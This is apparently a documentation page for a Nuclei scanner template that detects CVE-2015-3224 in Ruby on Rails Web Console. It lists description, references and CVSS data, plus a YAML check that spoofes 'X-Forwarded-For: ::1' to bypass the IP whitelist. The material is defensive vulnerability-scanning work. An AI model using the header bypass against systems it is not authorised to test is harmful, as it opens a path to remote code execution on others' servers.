Ruby on Rails Web Console - Remote Code Execution
ID: CVE-2015-3224
Severity: medium
Author: pdteam
Tags: cve2015,cve,ruby,hackerone,rce,rails,intrusive,rubyonrails
Description
Section titled “Description”Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client’s IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb.
YAML Source
Section titled “YAML Source”id: CVE-2015-3224
info: name: Ruby on Rails Web Console - Remote Code Execution author: pdteam severity: medium description: Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb. impact: | Remote code execution can lead to unauthorized access, data breaches, and complete compromise of the affected system. remediation: | Upgrade to a patched version of Ruby on Rails or disable the Web Console feature. reference: - https://www.metahackers.pro/rails-web-console-v2-whitelist-bypass-code-exec/ - https://www.jomar.fr/posts/2022/basic_recon_to_rce_ii/ - https://hackerone.com/reports/44513 - https://nvd.nist.gov/vuln/detail/CVE-2015-3224 - http://lists.fedoraproject.org/pipermail/package-announce/2015-June/160881.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-3224 cwe-id: CWE-284 epss-score: 0.92904 epss-percentile: 0.99025 cpe: cpe:2.3:a:rubyonrails:web_console:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rubyonrails product: web_console tags: cve2015,cve,ruby,hackerone,rce,rails,intrusive,rubyonrails
http: - method: GET path: - "{{BaseURL}}/{{randstr}}"
headers: X-Forwarded-For: ::1
matchers-condition: and matchers: - type: word part: body words: - "Rails.root:" - "Action Controller: Exception caught" condition: and
- type: word part: response words: - X-Web-Console-Session-Id - data-remote-path= - data-session-id= case-insensitive: true condition: or# digest: 4b0a00483046022100b87680a1bd881ee89965ad473782767654d9e710b2383e54a554aef84dce70ae022100aef5f9162a1192a201f463d6b89b6569df5db0b9981cf05150c18f84aa42782c:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2015/CVE-2015-3224.yaml"